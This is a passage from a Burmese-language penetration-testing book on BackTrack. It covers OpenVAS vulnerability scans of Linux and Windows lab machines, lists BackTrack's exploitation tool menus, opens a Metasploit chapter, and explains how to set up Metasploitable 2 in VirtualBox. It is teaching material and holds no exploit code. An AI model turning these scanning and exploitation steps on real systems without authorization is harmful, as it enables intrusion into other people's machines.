abilities ကို ၿပီးဆံုးေအာင္လုပ္ေဆာင္ျခင္းကို လုပ္ေဆာင္ခဲ့ပါသည္။ OpenVAS သည္ အထက္တြင္
ေဖာ္ျပထားေသာ စာရင္းအရ NVT Feed အပါအ၀င္ ရွာေဖြေတြ႕ရိွၿပီးျဖစ္ေသာ Vulnerabilties မ်ားကို
ရွာေဖြႏိုင္မည္ျဖစ္သည္။

ရွာေဖြျခင္းကိုလုပ္ေဆာင္ၿပီးေသာအခါတြင္ Report ကိုၾကည္႕ျခင္းျဖင့္ Result မ်ားကို ၾကည္႕ရွဳႏိုင္ရန္အ


တြက္

၁။ Scan Management>Tasks သို႕သြားေရာက္ပါ။

116 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၂။ Nework Vulnerabilities Scan ေဘးတြင္ရိွေသာ ခရမ္းေရာင္ Mangnifying Glass (မွန္ဘီလူးပံု) တြင္


Click ႏိွပ္ေပးရပါမည္။

၃။ Report ကိုၾကည္႕ရန္အတြက္ Download Arrow ကို click တစ္ခ်က္ႏိွပ္ပါ။

OpenVAS – finding Linux-specific Vulner-


abilities
ယခုအပိုင္းတြင္ OpenVAS ကိုအသံုးျပဳ၍ Linux ၏အားနည္းခ်က္ယိုေပါက္မ်ားကို ရွာေဖြျခင္းတို႕ကို
ေဖာ္ျပေပးပါမည္။ အကယ္၍ Target ျပဳလုပ္ေသာ ကြန္ယက္သည္ Linux Machine မ်ားကိုသာ
အသံုးျပဳထားျခင္းျဖစ္ပါက သတ္မွတ္ထားေသာ အားနည္းခ်က္ယိုေပါက္ (vulnerabilities) မ်ားကိုရွာေဖြ
ျခင္းအတြက္ ယခုအပိုင္းက အေထာက္အပံ့ျဖစ္ေစမည္ျဖစ္သည္။

ယခုအပိုင္းကိုေလ့လာရန္အတြက္ စမ္းသပ္ရန္ေအာက္တြင္ေဖာ္ျပထားေသာ စနစ္မ်ားကို Virtual Machine


ျဖင့္ အသံုးျပဳထားရပါမည္။

မ်က္ပြင့္စာေပ 117
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

 Metasploitable 2
 Any other flavor of linux

OpenVAS ျဖင့္ Linux အထူးျပဳအားနည္းခ်က္ယိုေပါက္မ်ားကို ရွာေဖြျခင္းလုပ္ေဆာင္ခ်က္မ်ား ေဆာင္ရြက္


ႏိုင္ရန္ Mozilla Firefox ကဲ့သို႕ေသာ Web Browser တစ္ခုခုကိုအသံုးျပဳရပါမည္။

၁။ OpenVAS ကို Log In ျပဳလုပ္ရန္အတြက္ Web Browser ၏ Address bar တြင္ http://127.0.0.1
:9392 ဟုရိုက္ထည္႕ေပးရပါမည္။

၂။ Configuration> Scan Configs ကိုေရြးခ်ယ္ေပးရပါမည္။ ေအာက္တြင္ပံုႏွင့္တကြေဖာ္ျပထားပါသည္။

၃။ Scan ျပဳလုပ္ေစမည္႕ အမည္ကိုသတ္မွတ္ေပးရပါမည္။ ယခုအပိုင္းတြင္ Linux Vulnerabilities ဟု


အမည္ေပးထားပါသည္။

၄။ Base အတြက္ Empty, Static and fast option ကိုေရြးခ်ယ္ေပးရပါမည္။ ထုိ Option သည္ Scratch မွ
စတင္ေစရန္ႏွင့္ ကိုယ္ပိုင္ Configuration ကိုဖန္တီးတည္ေဆာက္ရပါမည္။

၅။ Create Scan Config ကို Click ႏိွပ္ပါ။

118 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၆။ Scan ျပဳလုပ္မည္႕ Config ဖိုင္ကို ျပင္ဆင္ေပးရပါမည္။ ထို႕ေၾကာင့္ Linux Vulnerability မ်ားကို ရွာေဖြ
ရန္အတြက္ Wrench Icon ကို Click ျပဳလုပ္ရပါမည္။

ြဲ ိွပ္ၿပီးေနာက္ Find Bar ေပၚတြင္ Linux ဟုရိုက္ထည္႕ေပးရပါမည္။


၇။ Ctrl + F ကိုတႏ

၈။ ေတြ႕ရိွၿပိးေသာ Family တစ္ခုစီအတြက္ Select all NVT box မ်ားကို အမွန္ျခစ္ေပးရပါမည္။ ေရြးခ်ယ္
ထားၿပီးေသာ အားနည္းခ်က္ယိုေပါက္မ်ားမွာ

 Brute force attacks


 Buffer overflow
 Comliance
 Credentials
 Databases
 Default Accounts
 Denial of Service
 FTP
 Finger abuses
 Gain a shell remotely
 General
 Malware
 Netware
 NMAP NSE
 Port Scanners
 Privilege Escalation
 Product Detection
 RPC
 Remote File Access
 SMTP Problems

မ်က္ပြင့္စာေပ 119
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

 SNMP
 Service detection
 Settings
 Wireless services
 Web Servers

၉။ Save Config တြင္ Click ႏိွပ္ေပးရပါမည္။

၁၀။ Configuration> Targets သိ႕ု သြားေရာက္ေပးရပါမည္။

၁၁။ Target အသစ္တစ္ခုကို ဖန္တီးေပးရပါမည္။ ထိ႕ု ေနာက္ ေအာက္တြင္ေဖာ္ျပထားေသာလုပ္ေဆာင္


ခ်က္မ်ားကို လုပ္ေဆာင္ရပါမည္။

i. Target အတြက္ အမည္ကို ေရြးခ်ယ္ေပးရပါမည္။


ii. ေအာက္ပါနည္းလမ္းမ်ားမွ တစ္ခုကိုေရြးခ်ယ္အသံုးျပဳျခင္းျဖင့္ Host မ်ားကို ေရြးခ်ယ္ႏိုင္ပါ
သည္။
o Address တစ္ခုကို ေရြးခ်ယ္၍ျဖစ္ေစ
ဥပမာ - 192.168.0.10
o Address မ်ားကို Comma တစ္ခုစီျဖင့္ ျခားလ်က္ျဖစ္ေစ
ဥပမာ - 192.168.0.10, 192.168.0.115
o Address ၏ Range ကိုသတ္မွတ္၍ ျဖစ္ေစ
ဥပမာ - 192.168.0.1-20

120 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

အသံုးျပဳႏိုင္ပါသည္။

၁၂။ Save Target တြင္ Click ႏိွပ္ပါ။

၁၃။ ထို႕ေနာက္ Scan management> New Task ကို ေရြးခ်ယ္ၿပီးေနာက္ ေအာက္ပါ လုပ္ေဆာင္ခ်က္မ်ား
ကို လုပ္ေဆာင္ေပးရပါမည္။

i. Task ၏အမည္ကိုသတ္မွတ္ေပးရပါမည္။
ii. Comment တစ္ခုကို ဆႏၵရိွပါက ထည္႕သြင္းေပးႏုိင္ပါသည္။
iii. Scan Configuration ကိုသတ္မွတ္ေပးရပါမည္။ ယခုေနရာတြင္ Linux Vulnerabilities ဟု
သံုးစြပ
ဲ ါမည္။
iv. Scan Targets ကိုေရြးခ်ယ္ေပးပါမည္။ ယခုေနရာတြင္ Local Network ဟုသံုးစြပ
ဲ ါမည္။
v. အျခားေသာ Option မ်ားကို ျပင္ဆင္ေပးရန္မလိုပါ။
vi. Create Task တြင္ Click ႏိွပ္ပါ။

၁၄။ Scan Management>Tasks ကိုေရြးခ်ယ္ေပးရပါမည္။

၁၅။ Scan ျပဳလုပ္ရန္ Play Button တြင္ Click ႏိွပ္ပါ။ ယခုေနရာတြင္ Scan အမည္သည္ Linux
Vulnerabilities Scan ျဖစ္ပါသည္။

ယခုအပိုင္းတြင္ OpenVAS ကိုအသံုးျပဳၿပီး Web-based Interface သို႕ Login ၀င္ေရာက္ျခင္းကို ေလ့လာ


ခဲ့ရပါသည္။ Linux Vulnerabilities မ်ားကို ရွာေဖြရန္အတြက္ OpenVAS ကို Configure ျပဳလုပ္ခဲ့ပါသည္။
ေနာက္ဆံုးအေနျဖင့္ Target ကိုေရြးခ်ယ္ၿပီး အားနည္းခ်က္ကို ရွာေဖြခဲ့ပါသည္။ NVT Feed တြင္ သိရိွထား

မ်က္ပြင့္စာေပ 121
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

ၿပီးျဖစ္ေသာ အားနည္းခ်က္ယိုေပါက္မ်ားကို Target System တြင္ရွာေဖြရန္အတြက္ OpenVAS ကိုအသံုးျပဳ


ခဲ့ရပါမည္။

Scan လုပ္ေဆာင္ျခင္းကို ျပဳလုပ္ၿပီးေနာက္ Report ကိုၾကည္႕ရွဳျခင္းျဖင့္ ေတြ႕ရိွလာသည္႕ Result မ်ားကို


ေတြ႕ျမင္ႏိုင္ပါသည္။

၁။ Scan Management>Tasks သိ႕ု သြားေရာက္ပါ။

၂။ Linux Vulnerabilities Scan ကိုဆက္လုပ္ျပဳလုပ္ရန္ Purple Magnifying Glass တြင္ Click ႏိွပ္ပါ။

၃။ Report ကို ၾကည္႕ရွဳရန္ Download Arrow ကို Click ႏိွပ္ပါ။

OpenVAS – finding Windows-specific Vul-


nerabilities
ယခုအပိုင္းတြင္ OpenVAS ကိုအသံုးျပဳၿပီး Windows အေျချပဳအားနည္းခ်က္ယိုေပါက္မ်ားကို ရွာေဖြျခင္းကို
ေလ့လာၾကည္႕ရပါမည္။ Target Network မွ Window စနစ္အသံုးျပဳေသာ ကြန္ပ်ဴတာမ်ားအတြက္
သတ္မွတ္ထားေသာ အားနည္းခ်က္ယိုေပါက္မ်ား ရွာေဖြျခင္းကို စတင္ေလ့လာၾကည္႕ရပါမည္။

122 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

ယခုအပိုင္းကို ၿပည္႕စံုစြာျပဳလုပ္ႏိုင္ေစရန္ Virtual Machine တြင္ေအာက္ပါ စနစ္မ်ားကို အသံုးျပဳ၍ စမ္းသပ္


လုပ္ေဆာင္ၾကည္႕ႏိုင္ပါသည္။

 Windows XP
 Windows 7

OpenVAS ကိုအသံုးျပဳ၍ Window အေျချပဳ အားနည္းခ်က္မ်ားကို ရွာေဖြရန္အတြက္ Mozilla Firefox


ကဲ့သို႕ေသာ Web Browser ကိုအသံုးျပဳ၍ ေဆာင္ရြက္လုပ္ေဆာင္ေပးရပါမည္။

၁။ OpenVAS ကို Log In ၀င္ေရာက္ႏိုင္ေစရန္ Mozilla Firefox ၏ Address Bar တြင္ http://127.0.0.1
:9392 ဟူ၍ ရိုက္ထည္႕ေပးရပါမည္။

၂။ Configuration> Scan Configs တြင္ေရြးခ်ယ္ Click ႏိွပ္ေပးပါ။

၃။ Scan ျပဳလုပ္မည္႕အမည္ကို ထည္႕သြင္းေပးရပါမည္။ ယခုေနရာတြင္ Window Vulnerabilities ဟု


သံုးစြပ
ဲ ါမည္။

၄။ Base အတြက္ Empty, Static and Fast Option ကိုေရြးခ်ယ္ေပးရပါမည္။ ထို Option သည္ Scratch
မွ စတင္ရန္ႏွင့္ ကိုယ္ပိုင္ Configuration ဖိုင္ကို ဖန္တီးရန္အတြက္အသံုးျပဳႏိုင္ပါသည္။

၅။ Create Scan Config ေပၚတြင္ Click ႏိွပ္ပါ။

မ်က္ပြင့္စာေပ 123
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၆။ Scan Config ကို ျပင္ဆင္ရန္ လိုအပ္ပါသည္။ ထို႕ေၾကာင့္ Window Vulnerabilities ကိုရွာေဖြရန္


Wrench Icon ကို ႏိွပ္ပါ။

၇။ ရွာေဖြေတြ႕ရိွထားေသာ Family တစ္ခုစီအတြက္ Select All NVT box တြင္အမွန္ျခစ္ေပးေရြးခ်ယ္ရပါ


မည္။ ေရြးခ်ယ္ရမည္႕ အားနည္းခ်က္မ်ားမွာ

 Brute force attacks


 Buffer overflow
 Compliance
 Credentials
 Databases
 Default Accounts
 Denial of Service
 FTP
 Gain a shell remotely
 General
 Malware
 NMAP NSE
 Port Scanners
 Privilege Escalation
 Product Detection
 RPC
 Remote File Access

124 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

 SMTP Problems
 SNMP
 Service detection
 Web Servers
 Windows
 Windows : Microsoft Bulletins တို႕ျဖစ္သည္။

၈။ Save Config တြင္ Click ႏိွပ္ပါ။

၉။ Configuration>Targets သို႕သြားေရာက္ပါ။

မ်က္ပြင့္စာေပ 125
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၁၀။ Target အသစ္တစ္ခုကို ဖန္တီးေပးရပါမည္။ ထို႕ေနာက္ ေအာက္တြင္ေဖာ္ျပထားေသာ အလုပ္မ်ားကို


လုပ္ေဆာင္ေပးရပါမည္။

i. Target အတြက္ အမည္ကို သတ္မွတ္ေပးရပါမည္။


ii. ေအာက္တြင္ေဖာ္ျပထားေသာ နည္းလမ္းမ်ားထဲမွ တစ္ခုကိုအသံုးျပဳ၍ Host မ်ားကို သတ္မွတ္
ေပးႏိုင္ပါသည္။
a. Address တစ္ခုကို သတ္မွတ္၍ ျဖစ္ေစ (192.168.0.10)
b. Address မ်ား၏ Range တစ္ခုကိုသတ္မွတ္၍ျဖစ္ေစ (192.168.0.1-20)

လုပ္ေဆာင္ႏိုင္ပါသည္။

၁၁။ ထို႕ေနာက္ Save Target တြင္ Click ႏိွပ္ပါ။

၁၂။ Scan Management> New Task ကိုေရြးခ်ယ္ေပးၿပီးေနာက္ ေအာက္ပါ အလုပ္မ်ားကို ျပဳလုပ္ေပးရပါ


မည္။

i. Task တစ္ခု၏အမည္ကို သတ္မွတ္ေပးရပါမည္။


ii. Comment တစ္ခုကို ေပးလိုပါက ေပးထားႏိုင္ပါသည္။
iii. Window Vulnerabilities ဟုအမည္ေပးထားေသာ Scan Configuration ကုိေရြးခ်ယ္ေပးရပါ
မည္။
iv. Local Network ဟူေသာ Scan Targets ကုိေရြးခ်ယ္ေပးရပါမည္။
v. အျခားေသာ Option မ်ားကို ေျပာင္းလဲရန္မလိုပါ။
vi. Create Task တြင္ click ႏိွပ္ပါ။

126 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၁၃။ ထို႕ေနာက္ Scan Management>Tasks ကိုေရြးခ်ယ္ေပးရပါမည္။

၁၄။ Windows Vulnerabilities Scan ျပဳလုပ္ျခင္းကို ေရွ႕ဆက္ရန္ Play ခလုတ္တြင္ click ႏိွပ္ပါ။

အလုပ္လုပ္ေဆာင္ပုံကိုေလ့လာၾကည္႕ပါမည္။ ယခုအပိုင္းတြင္ OpenVAS ကို Launch ျပဳလုပ္ၿပီး Web-


based Interface အျဖစ္အသံုးေသာ OpenVAS တြင္ Login ျပဳလုပ္ရပါမည္။ ထို႕ေနာက္ Windows
Vulnerabilities မ်ားကိုရွာေဖြႏိုင္ေစရန္ OpenVAS ကို Configure ျပဳလုပ္ေပးရပါမည္။ ေနာက္ဆံုးအရ
Target ကိုေရြးခ်ယ္ကာ Scan ျပဳလုပ္ျခင္းကို ၿပီးစီးေအာင္လုပ္ေဆာင္ေပးရပါမည္။ NVT Feed တြင္
ပါ၀င္ေသာ သိၿပီးျဖစ္သည္႕အားနည္းခ်က္ယိုေပါက္မ်ားကို Target System တြင္ရွာေဖြရန္အတြက္
OpenVAS ကိုအသံုးျပဳနည္းကိုေဖာ္ျပခဲ့ပါသည္။

Scan ျပဳလုပ္ျခင္း ၿပီးစီးေသာအခါတြင္ Report ကိုၾကည္႕ရွဳျခင္းျဖင့္ Result မ်ားကိုေတြ႕ျမင္ရမည္ျဖစ္သည္။

၁။ Scan Management> Tasks သို႕သြားေရာက္ပါ။

၂။ Window Vulnerabilities Scan ျပဳလုပ္ရန္ ခရမ္းေရာင္ Magnifying Glass (မွန္ဘီလူးပံု) ေပၚတြင္ Click
ႏိွပ္ပါ။

၃။ Report ကိုၾကည္႕ရွဳရန္ Download Arrow တြင္ Click ႏိွပ္ပါ။

မ်က္ပြင့္စာေပ 127
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

128 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Chapter 5

Exploitation
ထိုးေဖာက္၀င္ေရာက္ျခင္း

မ်က္ပြင့္စာေပ 129
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

ႈIntroduction
Vulnerability ရွာေဖြျခင္း လုပ္ငန္းစဥ္မ်ားကို ေလ့လာၿပီးေသာအခါတြင္ Target System မ်ားကို
တိုက္ခိုက္ရန္ Exploit မ်ားေမာင္းႏွင္ေပးၿပီး Attack ျပဳလုပ္ရန္ ႀကိဳးပမ္းမႈကို အနည္းငယ္မွ် ဗဟုသုဓ ရရိွၿပီး
ျဖစ္သည္ဟု ေမွ်ာ္လင့္ပါသည္။ ယခုအခန္းတြင္ System မ်ားကို စမ္းသပ္ျခင္း၏ Swiss Army Knife
ျဖစ္ေသာ Metasploit ဟူေသာ Tool အပါအ၀င္ Tool အမ်ိဳးမ်ိဳး၏ အသံုးျပဳပံုမ်ားကို ရွင္းျပေပးသြားမည္ျဖစ္
ပါသည္။ ယခုအခန္းတြင္ ေလ့လာရမည္႕ အပိုင္းမ်ားမွာ

 Implementing exploits from BackTrack


 Installing and configuring Metasploitable
 Mastering Armitage – the graphical management tool for Metasploit
 Mastering the Metasploit Console (MSFCONSOLE)
 Mastering the Metasploit CLI (MSFCLI)
 Mastering Meterpreter
 Metasloitable MySQL
 Metasploitable PostgreSQL
 Metasploitable Tomcat
 Metasploitable PDF
 Implementing the browser_autopwn module တို႕ျဖစ္ၾကပါသည္။

Implementing exploits from BackTrack


ယခုအပိုင္းတြင္ BackTrack 5 တြင္ပါ၀င္ေသာ exploits မ်ားကို အသံုးျပဳျခင္းနည္းလမ္းအခ်ိဳ႕ကို ေဖာ္ျပေပး
မည္ျဖစ္သည္။ အသစ္ထြက္ရိွလာေသာ BackTrack Version တစ္ခုစီတြင္ BackTrack Community
အေနျဖင့္ Exploit အသစ္မ်ား၊ ယခင္ပါ၀င္ခဲ့ေသာ Exploit မ်ား၏ ျဖည္႕စြက္မ်ားလည္း ပါ၀င္လာေလ့ရိွ
ပါသည္။ Bug တစ္ခုကိုအသံုးျပဳျခင္း သို႕မဟုတ္ Software (သို႕) Program ၏အားနည္းခ်က္
တစ္စိတ္တစ္ပိုင္းကိုအသံုးျပဳျခင္းျဖင့္ ရည္ရြယ္ထားေသာ ထိုးေဖာက္၀င္ေရာက္ မႈမ်ားကိုျပဳလုပ္ႏိုင္ေစရန္

130 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

ရည္ရြယ္၍ Exploit တစ္ခုကိုအသံုးျပဳႏိုင္သည္။ ဥပမာအားျဖင့္ Application တစ္ခု၏ အားနည္းခ်က္ယို


ေပါက္တစ္ခုကို အသံုးျပဳျခင္းျဖင့္ Exploit ကိုအသံုးျပဳႏိုင္ပါသည္။ Website တစ္ခုကို ဥပမာထား၍ ေျပာရ
လွ်င္ Exploit တစ္ခုကိုအသံုးျပဳျခင္းျဖင့္ Database Server သို႕၀င္ေရာက္ျခင္း၊ အျခားေသာ Machine
မ်ားသို႕ ၀င္ေရာက္ႏိုင္ရန္အတြက္ Super user တစ္ခုအျဖစ္ အဆင့္ျမွင့္တင္ျခင္း အစရိွေသာ လုပ္ေဆာင္
ခ်က္မ်ားကို လုပ္ေဆာင္ေစႏိုင္ပါသည္။ Software အသစ္တစ္ခုကို ထုတ္လိုက္ၿပီးေသာအခါတြင္ ျဖစ္ႏိုင္
ဖြယ္ရာ အားနည္းခ်က္မ်ားႏွင့္ Bug မ်ားကိုလည္း ထို Software Package မ်ားတြင္ ေတြ႕ရိွရတတ္ပါသည္။
ထို႕ေၾကာင့္ မ်ားစြာေသာ ကိစၥရပ္မ်ားေၾကာင့္ Hacker တစ္ဦးသည္ အားနည္းခ်က္ယိုေပါက္မ်ားကို ဦးစြာ
ရွာေဖြလ်က္ ထိုအားနည္းခ်က္ယိုေပါက္မ်ားကိုနင္း၍ Exploit ေရးသားေလ့ရိွပါသည္။ ထိုအခ်က္မ်ားေၾကာင့္
BackTrack ထုတ္လုပ္သူမ်ားႏွင့္ Community မ်ားသည္ အသစ္ထပ္ထုတ္ေသာ BackTrack Version
အသစ္မ်ားတြင္ Exploit အသစ္မ်ားကို ထပ္ထုတ္ေပးေလ့ရိွပါသည္။

၁။ Start menu မွ Applications> BackTrack> Exploitation tools သို႕အဆင့္ဆင့္ေရြးခ်ယ္ေပးရပါမည္။

၂။ ထို႕ေနာက္ အသံုးျပဳႏိုင္ေသာ Exploit အမ်ိဳးအစားမ်ားႏွင့္ အမ်ိဳးအစားခြမ


ဲ ်ားကို ေအာက္ပါအတိုင္း
ေတြ႕ျမင္ရပါလိမ့္မည္။

 Network Exploitation Tools:


Cisco Attacks
Fast-Track
Metasploit Framework
SAP Exploitation

မ်က္ပြင့္စာေပ 131
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

 Web Exploitation Tools


 Database Exploitation Tools
MSSQL Exploitation Tools
MySQL Exploitation Tools
Oracle Exploitation tools
 Wireless Exploitation Tools
BlueTooth Exploitation
GSM Exploitation
WLAN Exploitation
 Social Engineering Tools
BeEF XSS Framework
HoneyPots
Social Engineering Toolkit
 Physical Exploitation
 Open Source Exploitation
Exploit-DB
Online Archives တို႕ျဖစ္ၾကပါသည္။

၃။ အမ်ိဳးအစားႏွင့္ အမ်ိဳးအစားခြဲ တစ္ခုစီတြင္ သီးသန္႕ Link မ်ားပါ၀င္ၿပီး အမ်ိဳးမ်ိဳးေသာ Tool မ်ားျဖင့္


ခ်ိတ္ဆက္ထားပါသည္။ ၄င္း Tool မ်ားသည္ GUI Mode တြင္လည္းေကာင္း၊ Web Page ေပၚတြင္လည္း
ေကာင္း၊ Terminal Window ေပၚတြင္လည္းေကာင္း စသည္ျဖင့္ Tool အမ်ိဳးအစားကိုလုိက္၍ ကြျဲ ပားစြာ
အသံုးျပဳရပါသည္။

ယခုအပိုင္းတြင္ BackTrack ၏ Exploitation Tools Menu Option ကိုအသံုးျပဳျခင္းျဖင့္ Exploitation Tool


မ်ားကိုအသံုးျပဳျခင္းကိုေဖာ္ျပခဲ့ပါသည္။ အပိုအျဖစ္ BackTrack ၏ Command line ေပၚတြင္ အသံုးျပဳႏိုင္
ေသာ Tool အားလံုးကိုေဖာ္ျပခဲ့ပါသည္။

132 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Installing and Configuring Metasploitable


ယခုအပိုင္းတြင္ Metasploitable 2 ကို Install ျပဳလုပ္ျခင္း၊ Configure ျပဳလုပ္ျခင္းႏွင့္ စတင္ျခင္းတို႕ကို
ေဖာ္ျပေပးမည္ျဖစ္သည္။ Metasploitable ဆိုသည္မွာ Linux အေျချပဳ Operating System တစ္ခုျဖစ္ၿပီး
မ်ားစြာေသာ Metasploit attack မ်ားျပဳလုပ္ရန္ အားနည္းခ်က္ကိုျပဳလုပ္ေပးပါသည္။ ၄င္းကို Rapid7 မွ
ဒီဇိုင္းျပဳလုပ္ခဲ့ၿပီး Metasploit Framework မွ ပိုင္ဆိုင္ပါသည္။ Metasploiatable ဆိုသည္မွာ Meterpreter
ကိုအသံုးျပဳျခင္းျဖင့္ Command မ်ားကို Executing ျပဳလုပ္ျခင္းျဖင့္ အနီးစပ္ဆံုးတူေစေသာ အေကာင္းဆံုး
နည္းလမ္းတစ္ခုပင္ျဖစ္ပါသည္။

ယခုအပိုင္းကိုေလ့လာရန္အတြက္ ေအာက္ပါ လိုအပ္ခ်က္မ်ားႏွင့္ၿပည္႕စံုရပါမည္။

 Internet Connection
 အနည္းဆံုး 8 GB ပမာဏရိွေသာ VirtualBox အသံုးျပဳသည္႕ PC
 Unzipping Tool (Window Machine တြင္အသံုးျပဳရန္အတြက္ 7 Zip Application ကိုအ
သံုးျပဳရန္အၾကံျပဳပါသည္။)

ယခုအပိုင္းကိုစတင္လုပ္ႏိုင္ရန္ metasploiatble 2 ကို Download ျပဳလုပ္ေပးရပါမည္။ ထို႕ေၾကာင့္


လုပ္ေဆာင္ခ်က္အေသးစိပ္ကို အဆင့္အလိုက္ ေဖာ္ျပေပးထားပါသည္။

၁။ ေအာက္တြင္ေဖာ္ျပထားေသာ Link မွ Metasploiatable 2 ကို Download ျပဳလုပ္ရပါမည္။

http://sourceforge.net/projects/metasploitable/files/Metasploitable2

၂။ ရရိွလာေသာ ဖိုင္ကို Hard Drive လမ္းေၾကာင္းတြင္ Save ျပဳလုပ္ရပါမည္။

၃။ ထိုဖိုင္ကို Unzip ျပဳလုပ္ပါ။

၄။ ထိုသို႕ Download ျပဳလုပ္ရရိွထားေသာ ဖိုင္ကိုထားေသာ လမ္းေၾကာင္းသို႕သြားေရာက္ရပါမည္။

၅။ Virtual Box ကိုဖြင့္ၿပီးေနာက္ New ခလုတ္ကို Click ႏိွပ္ပါ။

မ်က္ပြင့္စာေပ 133
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၆။ Next တြင္ Click ႏိွပ္ပါ။

၇။ ထို႕ေနာက္ Virtual Machine ၏နာမည္ကိုေရြးခ်ယ္ေပးရပါမည္။ ထိုေနရာတြင္ Metasploitable 2 ဟု


ေပးပါ။ ထိ႕ု ေနာက္ Operating System ကိုသတ္မွတ္လွ်င္ Linux ကိုေရြးခ်ယ္ပါ။ ထို႕ေနာက္ Version တြင္
Ubuntu ကုိေရြးခ်ယ္ေပးပါ။ ထို႕ေနာက္ Next ကိုေရြးခ်ယ္ေပးပါ။

134 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၈။ ထို႕ေနာက္ RAM ကို 512MB ပမာဏကို သတ္မွတ္ေပးရပါမည္။ ထို႕ေနာက္ Next တြင္ Click ႏိွပ္ပါ။

၉။ Use existing hard disk ကိုေရြးခ်ယ္ပါ။ ၿပိးေနာက္ Download ျပဳလုပ္၍ သိမ္းဆည္းထားေသာ


Metasploitable 2 Folder ထဲမွ VMDK ဖိုင္ကိုေရြးခ်ယ္ပါ။

မ်က္ပြင့္စာေပ 135
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၁၀။ ထိုအခါ Virtual Disk Window သည္ေအာက္တြင္ေဖာ္ျပထားေသာ ပံုအတိုင္းျဖစ္လာပါမည္။

ယခုလတ္တေလာတြင္ Hard Disk Space ကို ျပင္ဆင္ရန္မလိုအပ္ပါ။ အဘယ္ေၾကာင့္ဆိုေသာ္


Metasploitable ကိုအသံုးျပဳသည္႕အခါ System ကိုသာ Attack ျပဳလုပ္မည္ျဖစ္ၿပီး Operating System
ကဲ့သို႕အသံုးျပဳမည္ မဟုတ္ေသာေၾကာင့္ ျဖစ္သည္။ ထို႕ေနာက္ Next တြင္ Click ႏိွပ္ပါ။

136 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၁၁။ ထို႕ေနာက္ Create တြင္ Click ႏိွပ္ေပးရပါမည္။

၁၂။ Metasploitable 2 ကိုစတင္ရန္ နာမည္တြင္ Click တစ္ခ်က္ႏိွပ္၍ Start ခလုတ္ကိုလည္း Click


တစ္ခ်က္ႏိွပ္ေပးရပါမည္။

အလုပ္လုပ္ေဆာင္ပံုကိုေလ့လာၾကည္႕လွ်င္ ယခုအပိုင္းတြင္ Virtual Box အတြင္း Metasploitable 2 ကို


Set up ျပဳလုပ္ျခင္းကိုေဖာ္ျပခဲ့ပါသည္။ ထို႕ေနာက္ Metasploitable ကို Sourceforge.net မွ Download
မ်က္ပြင့္စာေပ 137
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

ျပဳလုပ္ခဲ့ပါသည္။ ထို႕ေနာက္ VMDK ဖိုင္ကို Virtual Box မွ ေမာင္းႏွင္ရန္အတြက္ Configure လုပ္ေဆာင္ခဲ့


